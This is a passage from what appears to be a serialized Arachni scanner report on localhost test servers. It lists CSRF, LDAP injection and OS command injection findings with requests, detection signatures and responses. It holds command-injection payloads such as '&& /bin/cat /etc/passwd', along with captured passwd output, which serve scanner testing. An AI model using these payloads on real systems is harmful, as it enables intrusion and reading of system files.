\n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: logged_in=true response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NDIx !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowNSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Cross-Site Request Forgery description: ! "The web application does not, or can not,\n sufficiently verify whether a well-formed, valid, consistent\n request was intentionally provided by the user who submitted the request.\n This is due to a lack of secure anti-CSRF tokens to verify\n the freshness of the submitted data." tags: - csrf - rdiff - form - token cwe: '352' cwe_url: http://cwe.mitre.org/data/definitions/352.html severity: High remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data must be added to all web application elements that can affect\n business logic." mod_name: CSRF variations: [] internal_modname: CSRF internal_modname: CSRF - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection OWASP: http://www.owasp.org/index.php/LDAP_injection var: input url: http://localhost:13347/form/append elem: form method: GET name: LDAP Injection description: ! "LDAP queries can be injected into the web application\n which can be used to disclose sensitive data of affect the execution flow." tags: - ldap - injection - regexp cwe: '90' cwe_url: http://cwe.mitre.org/data/definitions/90.html severity: High cvssv2: '' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being used in an LDAP query." remedy_code: '' mod_name: LDAPInjection variations: - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection OWASP: http://www.owasp.org/index.php/LDAP_injection opts: :redundant: false :async: true :regexp: !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== :match: !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== :substring: - !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== - !binary |- amF2YXgubmFtaW5nLk5hbWVOb3RGb3VuZEV4Y2VwdGlvbg== - !binary |- TERBUEV4Y2VwdGlvbg== - !binary |- Y29tLnN1bi5qbmRpLmxkYXA= - !binary |- U2VhcmNoOiBCYWQgc2VhcmNoIGZpbHRlcg== - !binary |- UHJvdG9jb2wgZXJyb3Igb2NjdXJyZWQ= - !binary |- U2l6ZSBsaW1pdCBoYXMgZXhjZWVkZWQ= - !binary |- QW4gaW5hcHByb3ByaWF0ZSBtYXRjaGluZyBvY2N1cnJlZA== - !binary |- QSBjb25zdHJhaW50IHZpb2xhdGlvbiBvY2N1cnJlZA== - !binary |- VGhlIHN5bnRheCBpcyBpbnZhbGlk - !binary |- T2JqZWN0IGRvZXMgbm90IGV4aXN0 - !binary |- VGhlIGFsaWFzIGlzIGludmFsaWQ= - !binary |- VGhlIGRpc3Rpbmd1aXNoZWQgbmFtZSBoYXMgYW4gaW52YWxpZCBzeW50YXg= - !binary |- VGhlIHNlcnZlciBkb2VzIG5vdCBoYW5kbGUgZGlyZWN0b3J5IHJlcXVlc3Rz - !binary |- VGhlcmUgd2FzIGEgbmFtaW5nIHZpb2xhdGlvbg== - !binary |- VGhlcmUgd2FzIGFuIG9iamVjdCBjbGFzcyB2aW9sYXRpb24= - !binary |- UmVzdWx0cyByZXR1cm5lZCBhcmUgdG9vIGxhcmdl - !binary |- VW5rbm93biBlcnJvciBvY2N1cnJlZA== - !binary |- TG9jYWwgZXJyb3Igb2NjdXJyZWQ= - !binary |- VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW5jb3JyZWN0 - !binary |- VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW52YWxpZA== - !binary |- VGhlIHNlYXJjaCBmaWx0ZXIgY2Fubm90IGJlIHJlY29nbml6ZWQ= - !binary |- SW52YWxpZCBETiBzeW50YXg= - !binary |- Tm8gU3VjaCBPYmplY3Q= - !binary |- SVBXb3Jrc0FTUC5MREFQ - !binary |- TW9kdWxlIFByb2R1Y3RzLkxEQVBNdWx0aVBsdWdpbnM= :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! 
'#^($!@$)(()))******' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default#^($!@$)(()))****** :follow_location: true :injected: default#^($!@$)(()))****** :combo: !binary "aW5wdXQ=": default#^($!@$)(()))****** :action: http://localhost:13347/form/append :verification: false :id: !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== var: input url: http://localhost:13347/form/append injected: default#^($!@$)(()))****** id: supplied argument is not a valid ldap regexp: supplied argument is not a valid ldap regexp_match: supplied argument is not a valid ldap elem: form remarks: {} method: GET response: ! 'supplied argument is not a valid ldap javax.naming.NameNotFoundException LDAPException com.sun.jndi.ldap Search: Bad search filter Protocol error occurred Size limit has exceeded An inappropriate matching occurred A constraint violation occurred The syntax is invalid Object does not exist The alias is invalid The distinguished name has an invalid syntax The server does not handle directory requests There was a naming violation There was an object class violation Results returned are too large Unknown error occurred Local error occurred The search filter is incorrect The search filter is invalid The search filter cannot be recognized Invalid DN syntax No Such Object IPWorksASP.LDAP Module Products.LDAPMultiPlugins ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzIz !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- 
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: LDAP Injection description: ! "LDAP queries can be injected into the web application\n which can be used to disclose sensitive data or affect the execution flow." tags: - ldap - injection - regexp cwe: '90' cwe_url: http://cwe.mitre.org/data/definitions/90.html severity: High cvssv2: '' remedy_guidance: ! "User inputs must be validated and filtered\n before being used in an LDAP query." remedy_code: '' mod_name: LDAPInjection variations: [] internal_modname: LDAPInjection internal_modname: LDAPInjection - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection OWASP: http://www.owasp.org/index.php/LDAP_injection var: input url: http://localhost:13347/link/append?input=default elem: link method: GET name: LDAP Injection description: ! "LDAP queries can be injected into the web application\n which can be used to disclose sensitive data or affect the execution flow." tags: - ldap - injection - regexp cwe: '90' cwe_url: http://cwe.mitre.org/data/definitions/90.html severity: High cvssv2: '' remedy_guidance: ! "User inputs must be validated and filtered\n before being used in an LDAP query."
remedy_code: '' mod_name: LDAPInjection variations: - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection OWASP: http://www.owasp.org/index.php/LDAP_injection opts: :redundant: false :async: true :regexp: !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== :match: !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== :substring: - !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== - !binary |- amF2YXgubmFtaW5nLk5hbWVOb3RGb3VuZEV4Y2VwdGlvbg== - !binary |- TERBUEV4Y2VwdGlvbg== - !binary |- Y29tLnN1bi5qbmRpLmxkYXA= - !binary |- U2VhcmNoOiBCYWQgc2VhcmNoIGZpbHRlcg== - !binary |- UHJvdG9jb2wgZXJyb3Igb2NjdXJyZWQ= - !binary |- U2l6ZSBsaW1pdCBoYXMgZXhjZWVkZWQ= - !binary |- QW4gaW5hcHByb3ByaWF0ZSBtYXRjaGluZyBvY2N1cnJlZA== - !binary |- QSBjb25zdHJhaW50IHZpb2xhdGlvbiBvY2N1cnJlZA== - !binary |- VGhlIHN5bnRheCBpcyBpbnZhbGlk - !binary |- T2JqZWN0IGRvZXMgbm90IGV4aXN0 - !binary |- VGhlIGFsaWFzIGlzIGludmFsaWQ= - !binary |- VGhlIGRpc3Rpbmd1aXNoZWQgbmFtZSBoYXMgYW4gaW52YWxpZCBzeW50YXg= - !binary |- VGhlIHNlcnZlciBkb2VzIG5vdCBoYW5kbGUgZGlyZWN0b3J5IHJlcXVlc3Rz - !binary |- VGhlcmUgd2FzIGEgbmFtaW5nIHZpb2xhdGlvbg== - !binary |- VGhlcmUgd2FzIGFuIG9iamVjdCBjbGFzcyB2aW9sYXRpb24= - !binary |- UmVzdWx0cyByZXR1cm5lZCBhcmUgdG9vIGxhcmdl - !binary |- VW5rbm93biBlcnJvciBvY2N1cnJlZA== - !binary |- TG9jYWwgZXJyb3Igb2NjdXJyZWQ= - !binary |- VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW5jb3JyZWN0 - !binary |- VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW52YWxpZA== - !binary |- VGhlIHNlYXJjaCBmaWx0ZXIgY2Fubm90IGJlIHJlY29nbml6ZWQ= - !binary |- SW52YWxpZCBETiBzeW50YXg= - !binary |- Tm8gU3VjaCBPYmplY3Q= - !binary |- SVBXb3Jrc0FTUC5MREFQ - !binary |- TW9kdWxlIFByb2R1Y3RzLkxEQVBNdWx0aVBsdWdpbnM= :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! 
'#^($!@$)(()))******' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default#^($!@$)(()))****** :follow_location: true :injected: default#^($!@$)(()))****** :combo: !binary "aW5wdXQ=": default#^($!@$)(()))****** :action: http://localhost:13347/link/append?input=default :verification: false :id: !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== var: input url: http://localhost:13347/link/append?input=default injected: default#^($!@$)(()))****** id: supplied argument is not a valid ldap regexp: supplied argument is not a valid ldap regexp_match: supplied argument is not a valid ldap elem: link remarks: {} method: GET response: ! 'supplied argument is not a valid ldap javax.naming.NameNotFoundException LDAPException com.sun.jndi.ldap Search: Bad search filter Protocol error occurred Size limit has exceeded An inappropriate matching occurred A constraint violation occurred The syntax is invalid Object does not exist The alias is invalid The distinguished name has an invalid syntax The server does not handle directory requests There was a naming violation There was an object class violation Results returned are too large Unknown error occurred Local error occurred The search filter is incorrect The search filter is invalid The search filter cannot be recognized Invalid DN syntax No Such Object IPWorksASP.LDAP Module Products.LDAPMultiPlugins ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzIz !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- 
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: LDAP Injection description: ! "LDAP queries can be injected into the web application\n which can be used to disclose sensitive data or affect the execution flow." tags: - ldap - injection - regexp cwe: '90' cwe_url: http://cwe.mitre.org/data/definitions/90.html severity: High cvssv2: '' remedy_guidance: ! "User inputs must be validated and filtered\n before being used in an LDAP query." remedy_code: '' mod_name: LDAPInjection variations: [] internal_modname: LDAPInjection internal_modname: LDAPInjection - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection OWASP: http://www.owasp.org/index.php/LDAP_injection var: cookie2 url: http://localhost:13347/cookie/append elem: cookie method: GET name: LDAP Injection description: ! "LDAP queries can be injected into the web application\n which can be used to disclose sensitive data or affect the execution flow." tags: - ldap - injection - regexp cwe: '90' cwe_url: http://cwe.mitre.org/data/definitions/90.html severity: High cvssv2: '' remedy_guidance: ! "User inputs must be validated and filtered\n before being used in an LDAP query."
remedy_code: '' mod_name: LDAPInjection variations: - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection OWASP: http://www.owasp.org/index.php/LDAP_injection opts: :redundant: false :async: true :regexp: !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== :match: !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== :substring: - !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== - !binary |- amF2YXgubmFtaW5nLk5hbWVOb3RGb3VuZEV4Y2VwdGlvbg== - !binary |- TERBUEV4Y2VwdGlvbg== - !binary |- Y29tLnN1bi5qbmRpLmxkYXA= - !binary |- U2VhcmNoOiBCYWQgc2VhcmNoIGZpbHRlcg== - !binary |- UHJvdG9jb2wgZXJyb3Igb2NjdXJyZWQ= - !binary |- U2l6ZSBsaW1pdCBoYXMgZXhjZWVkZWQ= - !binary |- QW4gaW5hcHByb3ByaWF0ZSBtYXRjaGluZyBvY2N1cnJlZA== - !binary |- QSBjb25zdHJhaW50IHZpb2xhdGlvbiBvY2N1cnJlZA== - !binary |- VGhlIHN5bnRheCBpcyBpbnZhbGlk - !binary |- T2JqZWN0IGRvZXMgbm90IGV4aXN0 - !binary |- VGhlIGFsaWFzIGlzIGludmFsaWQ= - !binary |- VGhlIGRpc3Rpbmd1aXNoZWQgbmFtZSBoYXMgYW4gaW52YWxpZCBzeW50YXg= - !binary |- VGhlIHNlcnZlciBkb2VzIG5vdCBoYW5kbGUgZGlyZWN0b3J5IHJlcXVlc3Rz - !binary |- VGhlcmUgd2FzIGEgbmFtaW5nIHZpb2xhdGlvbg== - !binary |- VGhlcmUgd2FzIGFuIG9iamVjdCBjbGFzcyB2aW9sYXRpb24= - !binary |- UmVzdWx0cyByZXR1cm5lZCBhcmUgdG9vIGxhcmdl - !binary |- VW5rbm93biBlcnJvciBvY2N1cnJlZA== - !binary |- TG9jYWwgZXJyb3Igb2NjdXJyZWQ= - !binary |- VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW5jb3JyZWN0 - !binary |- VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW52YWxpZA== - !binary |- VGhlIHNlYXJjaCBmaWx0ZXIgY2Fubm90IGJlIHJlY29nbml6ZWQ= - !binary |- SW52YWxpZCBETiBzeW50YXg= - !binary |- Tm8gU3VjaCBPYmplY3Q= - !binary |- SVBXb3Jrc0FTUC5MREFQ - !binary |- TW9kdWxlIFByb2R1Y3RzLkxEQVBNdWx0aVBsdWdpbnM= :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! 
'#^($!@$)(()))******' :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value#^($!@$)(()))****** :injected: cookie value#^($!@$)(()))****** :combo: !binary "Y29va2llMg==": cookie value#^($!@$)(()))****** :action: http://localhost:13347/cookie/append :verification: false :id: !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== var: cookie2 url: http://localhost:13347/cookie/append injected: cookie value#^($!@$)(()))****** id: supplied argument is not a valid ldap regexp: supplied argument is not a valid ldap regexp_match: supplied argument is not a valid ldap elem: cookie remarks: {} method: GET response: ! 'supplied argument is not a valid ldap javax.naming.NameNotFoundException LDAPException com.sun.jndi.ldap Search: Bad search filter Protocol error occurred Size limit has exceeded An inappropriate matching occurred A constraint violation occurred The syntax is invalid Object does not exist The alias is invalid The distinguished name has an invalid syntax The server does not handle directory requests There was a naming violation There was an object class violation Results returned are too large Unknown error occurred Local error occurred The search filter is incorrect The search filter is invalid The search filter cannot be recognized Invalid DN syntax No Such Object IPWorksASP.LDAP Module Products.LDAPMultiPlugins ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value#^($!@$)(()))****** response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzIz !binary "U2VydmVy": !binary |- 
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: LDAP Injection description: ! "LDAP queries can be injected into the web application\n which can be used to disclose sensitive data or affect the execution flow." tags: - ldap - injection - regexp cwe: '90' cwe_url: http://cwe.mitre.org/data/definitions/90.html severity: High cvssv2: '' remedy_guidance: ! "User inputs must be validated and filtered\n before being used in an LDAP query." remedy_code: '' mod_name: LDAPInjection variations: [] internal_modname: LDAPInjection internal_modname: LDAPInjection - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection OWASP: http://www.owasp.org/index.php/LDAP_injection var: User-Agent url: http://localhost:13347/header/append elem: header method: GET name: LDAP Injection description: ! "LDAP queries can be injected into the web application\n which can be used to disclose sensitive data or affect the execution flow." tags: - ldap - injection - regexp cwe: '90' cwe_url: http://cwe.mitre.org/data/definitions/90.html severity: High cvssv2: '' remedy_guidance: ! "User inputs must be validated and filtered\n before being used in an LDAP query."
remedy_code: '' mod_name: LDAPInjection variations: - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection OWASP: http://www.owasp.org/index.php/LDAP_injection opts: :redundant: false :async: true :regexp: !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== :match: !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== :substring: - !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== - !binary |- amF2YXgubmFtaW5nLk5hbWVOb3RGb3VuZEV4Y2VwdGlvbg== - !binary |- TERBUEV4Y2VwdGlvbg== - !binary |- Y29tLnN1bi5qbmRpLmxkYXA= - !binary |- U2VhcmNoOiBCYWQgc2VhcmNoIGZpbHRlcg== - !binary |- UHJvdG9jb2wgZXJyb3Igb2NjdXJyZWQ= - !binary |- U2l6ZSBsaW1pdCBoYXMgZXhjZWVkZWQ= - !binary |- QW4gaW5hcHByb3ByaWF0ZSBtYXRjaGluZyBvY2N1cnJlZA== - !binary |- QSBjb25zdHJhaW50IHZpb2xhdGlvbiBvY2N1cnJlZA== - !binary |- VGhlIHN5bnRheCBpcyBpbnZhbGlk - !binary |- T2JqZWN0IGRvZXMgbm90IGV4aXN0 - !binary |- VGhlIGFsaWFzIGlzIGludmFsaWQ= - !binary |- VGhlIGRpc3Rpbmd1aXNoZWQgbmFtZSBoYXMgYW4gaW52YWxpZCBzeW50YXg= - !binary |- VGhlIHNlcnZlciBkb2VzIG5vdCBoYW5kbGUgZGlyZWN0b3J5IHJlcXVlc3Rz - !binary |- VGhlcmUgd2FzIGEgbmFtaW5nIHZpb2xhdGlvbg== - !binary |- VGhlcmUgd2FzIGFuIG9iamVjdCBjbGFzcyB2aW9sYXRpb24= - !binary |- UmVzdWx0cyByZXR1cm5lZCBhcmUgdG9vIGxhcmdl - !binary |- VW5rbm93biBlcnJvciBvY2N1cnJlZA== - !binary |- TG9jYWwgZXJyb3Igb2NjdXJyZWQ= - !binary |- VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW5jb3JyZWN0 - !binary |- VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW52YWxpZA== - !binary |- VGhlIHNlYXJjaCBmaWx0ZXIgY2Fubm90IGJlIHJlY29nbml6ZWQ= - !binary |- SW52YWxpZCBETiBzeW50YXg= - !binary |- Tm8gU3VjaCBPYmplY3Q= - !binary |- SVBXb3Jrc0FTUC5MREFQ - !binary |- TW9kdWxlIFByb2R1Y3RzLkxEQVBNdWx0aVBsdWdpbnM= :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! 
'#^($!@$)(()))******' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user#^($!@$)(()))****** :injected: arachni_user#^($!@$)(()))****** :combo: User-Agent: arachni_user#^($!@$)(()))****** :action: http://localhost:13347/header/append :verification: false :id: !binary |- c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA== var: User-Agent url: http://localhost:13347/header/append injected: arachni_user#^($!@$)(()))****** id: supplied argument is not a valid ldap regexp: supplied argument is not a valid ldap regexp_match: supplied argument is not a valid ldap elem: header remarks: {} method: GET response: ! 'supplied argument is not a valid ldap javax.naming.NameNotFoundException LDAPException com.sun.jndi.ldap Search: Bad search filter Protocol error occurred Size limit has exceeded An inappropriate matching occurred A constraint violation occurred The syntax is invalid Object does not exist The alias is invalid The distinguished name has an invalid syntax The server does not handle directory requests There was a naming violation There was an object class violation Results returned are too large Unknown error occurred Local error occurred The search filter is incorrect The search filter is invalid The search filter cannot be recognized Invalid DN syntax No Such Object IPWorksASP.LDAP Module Products.LDAPMultiPlugins ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user#^($!@$)(()))****** Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzIz !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- 
TW9uLCAxMSBGZWIgMjAxMyAwMTozOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: LDAP Injection description: ! "LDAP queries can be injected into the web application\n which can be used to disclose sensitive data or affect the execution flow." tags: - ldap - injection - regexp cwe: '90' cwe_url: http://cwe.mitre.org/data/definitions/90.html severity: High cvssv2: '' remedy_guidance: ! "User inputs must be validated and filtered\n before being used in an LDAP query." remedy_code: '' mod_name: LDAPInjection variations: [] internal_modname: LDAPInjection internal_modname: LDAPInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:12305/unix/form/append elem: form method: GET name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: !
' /bin/cat /etc/passwd' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default /bin/cat /etc/passwd :follow_location: true :injected: default /bin/cat /etc/passwd :combo: !binary "aW5wdXQ=": default /bin/cat /etc/passwd :action: http://localhost:12305/unix/form/append :verification: :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh var: input url: http://localhost:12305/unix/form/append injected: default /bin/cat /etc/passwd id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh elem: form remarks: {} method: GET response: ! '["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: [] internal_modname: OSCmdInjection internal_modname: OSCmdInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:12305/unix/form/straight elem: form method: POST name: Operating system command injection description: ! "The web application allows an attacker to\n execute arbitrary OS commands." tags: - os - command - code - injection - regexp cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh :substring: :ignore: :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :injected_orig: ! '&& /bin/cat /etc/passwd' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! '&& /bin/cat /etc/passwd' :follow_location: true :injected: ! '&& /bin/cat /etc/passwd' :combo: !binary "aW5wdXQ=": ! '&& /bin/cat /etc/passwd' :action: http://localhost:12305/unix/form/straight :verification: :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh var: input url: http://localhost:12305/unix/form/straight injected: ! '&& /bin/cat /etc/passwd' id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+) regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh elem: form remarks: {} method: POST response: ! 
